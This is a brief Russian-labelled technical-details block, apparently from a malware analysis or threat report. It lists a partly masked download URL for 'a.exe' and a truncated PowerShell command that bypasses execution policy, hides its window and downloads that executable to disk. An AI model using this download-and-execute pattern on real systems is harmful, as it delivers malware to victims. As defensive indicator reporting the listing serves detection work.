Техническая информация
- http://54.##3.198.219/a.exe
- http://54.##3.198.219/a.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Executionpolicy bypass -noprofile -windowstyle hidden -command "Set-Content -value (new-object System.net.webclient).downloaddata( 'http://54.##3.198.219/a.exe' ) -encoding byte -Path $env...' (со скрытым окном)